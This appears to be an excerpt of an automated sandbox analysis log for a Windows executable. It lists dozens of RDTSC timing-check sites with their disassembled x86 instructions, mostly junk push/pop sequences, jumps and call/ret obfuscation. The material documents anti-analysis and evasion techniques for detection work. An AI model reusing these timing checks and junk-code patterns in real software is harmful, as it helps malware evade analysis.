              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111B6FD second address: 111B701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111BA1D second address: 111BA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111BA21 second address: 111BA4B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4200FD2928h 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F4200FD2916h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111BB8C second address: 111BB92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111BB92 second address: 111BB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111BB9C second address: 111BBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111BBA0 second address: 111BBA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111BBA4 second address: 111BBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111BBAA second address: 111BBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4200FD291Eh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111BBC1 second address: 111BBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E393 second address: 111E399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E5CC second address: 111E5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E5D0 second address: 111E5E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 js 00007F4200FD2929h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E5E2 second address: 111E69E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F420070EDF7h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D3550h], edi 0x00000017 push 738A587Fh 0x0000001c push ecx 0x0000001d jnp 00007F420070EDF6h 0x00000023 jmp 00007F420070EDF0h 0x00000028 pop ecx 0x00000029 xor dword ptr [esp], 738A58FFh 0x00000030 jo 00007F420070EDE8h 0x00000036 mov esi, edi 0x00000038 push 00000003h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007F420070EDE8h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 mov cx, si 0x00000057 mov dword ptr [ebp+122D28F7h], esi 0x0000005d push 00000000h 0x0000005f sub dword ptr [ebp+122D33B7h], ebx 0x00000065 push 00000003h 0x00000067 call 00007F420070EDE9h 0x0000006c jns 00007F420070EDFBh 0x00000072 jmp 00007F420070EDF5h 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c push ebx 0x0000007d pop ebx 0x0000007e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E69E second address: 111E6A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E6A2 second address: 111E6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E6A8 second address: 111E6C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4200FD2927h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E6C4 second address: 111E73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c js 00007F420070EDECh 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a jno 00007F420070EDE8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 jmp 00007F420070EDF1h 0x0000002a pop eax 0x0000002b mov dword ptr [ebp+122D35F3h], esi 0x00000031 lea ebx, dword ptr [ebp+124492B6h] 0x00000037 and si, 4B08h 0x0000003c xchg eax, ebx 0x0000003d jmp 00007F420070EDECh 0x00000042 push eax 0x00000043 push edi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F420070EDF5h 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E7B8 second address: 111E7FA instructions: 0x00000000 rdtsc 0x00000002 js 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4200FD291Bh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov si, 847Bh 0x00000017 push 00000000h 0x00000019 je 00007F4200FD291Ch 0x0000001f mov dword ptr [ebp+122D333Ch], esi 0x00000025 call 00007F4200FD2919h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F4200FD291Ch 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E7FA second address: 111E837 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F420070EDE6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007F420070EDEEh 0x00000013 jno 00007F420070EDE8h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jg 00007F420070EDF3h 0x00000023 mov eax, dword ptr [eax] 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 ja 00007F420070EDE6h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E837 second address: 111E84C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E84C second address: 111E855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E855 second address: 111E859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E859 second address: 111E8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000003h 0x0000000a push eax 0x0000000b jmp 00007F420070EDF6h 0x00000010 pop edx 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D28D5h], edi 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F420070EDE8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 je 00007F420070EDEBh 0x0000003b sub si, 2453h 0x00000040 push 5F4737C6h 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F420070EDF3h 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E8CE second address: 111E910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e add dword ptr [esp], 60B8C83Ah 0x00000015 jne 00007F4200FD2916h 0x0000001b lea ebx, dword ptr [ebp+124492C1h] 0x00000021 mov edx, dword ptr [ebp+122D3730h] 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jo 00007F4200FD291Ch 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E910 second address: 111E916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 111E916 second address: 111E91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113DE44 second address: 113DE52 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F420070EDE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113DE52 second address: 113DE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD2927h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113DE6D second address: 113DE71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113DE71 second address: 113DE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113DE7D second address: 113DEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F420070EDF2h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F420070EDEAh 0x00000013 jne 00007F420070EDE6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E197 second address: 113E19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E19D second address: 113E1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F420070EDE6h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F420070EDEDh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E1C1 second address: 113E1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E1C7 second address: 113E1CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E336 second address: 113E33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E4A6 second address: 113E4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnp 00007F420070EDE6h 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 ja 00007F420070EDE6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f pushad 0x00000020 push esi 0x00000021 pop esi 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 push edx 0x00000025 pop edx 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E4CD second address: 113E4ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4200FD2926h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E667 second address: 113E674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F420070EDE6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E674 second address: 113E689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E689 second address: 113E69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F420070EDEFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E69C second address: 113E6B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F4200FD2916h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E97F second address: 113E9B1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F420070EDFFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jnp 00007F420070EDE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E9B1 second address: 113E9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E9B6 second address: 113E9CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F420070EDECh 0x00000008 jnl 00007F420070EDE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F420070EDE6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113E9CC second address: 113E9D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1113925 second address: 1113929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113EF20 second address: 113EF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113EF24 second address: 113EF2E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F420070EDE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113F649 second address: 113F64D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113F64D second address: 113F66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F420070EDF9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113F66F second address: 113F67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4200FD2916h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113F67B second address: 113F680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113F680 second address: 113F696 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4200FD291Fh 0x00000008 pop edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113F923 second address: 113F93F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113F93F second address: 113F948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113F948 second address: 113F982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F420070EE11h 0x0000000f push ecx 0x00000010 jmp 00007F420070EDF3h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F420070EDEAh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113FC06 second address: 113FC0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113FC0A second address: 113FC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 113FC10 second address: 113FC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F4200FD291Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11103E1 second address: 11103E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11103E7 second address: 11103F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4200FD2916h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1148C2F second address: 1148C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007F420070EDECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1147D6C second address: 1147D73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1148E17 second address: 1148E1C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 114E4F0 second address: 114E51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4200FD2925h 0x00000010 jmp 00007F4200FD291Dh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 114E93F second address: 114E97A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F420070EDE6h 0x00000009 je 00007F420070EDE6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F420070EDF9h 0x00000019 jmp 00007F420070EDEEh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 114E97A second address: 114E991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F4200FD2921h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 114E991 second address: 114E99B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 114EABD second address: 114EAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 114EAC3 second address: 114EB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F420070EDE6h 0x0000000a jmp 00007F420070EDF3h 0x0000000f popad 0x00000010 jg 00007F420070EDE8h 0x00000016 pushad 0x00000017 jmp 00007F420070EDF3h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1109873 second address: 110987B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11520D1 second address: 11520F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007F420070EDF4h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11520F5 second address: 11520F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11520F9 second address: 1152102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1152102 second address: 1152120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jns 00007F4200FD2918h 0x0000000f push eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop eax 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push esi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1152566 second address: 115256B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1152CBF second address: 1152CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4200FD2916h 0x0000000a popad 0x0000000b pop edx 0x0000000c mov dword ptr [esp], ebx 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F4200FD2918h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 xor dword ptr [ebp+122D19BEh], edi 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1152CF6 second address: 1152CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1152CFB second address: 1152D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4200FD2929h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
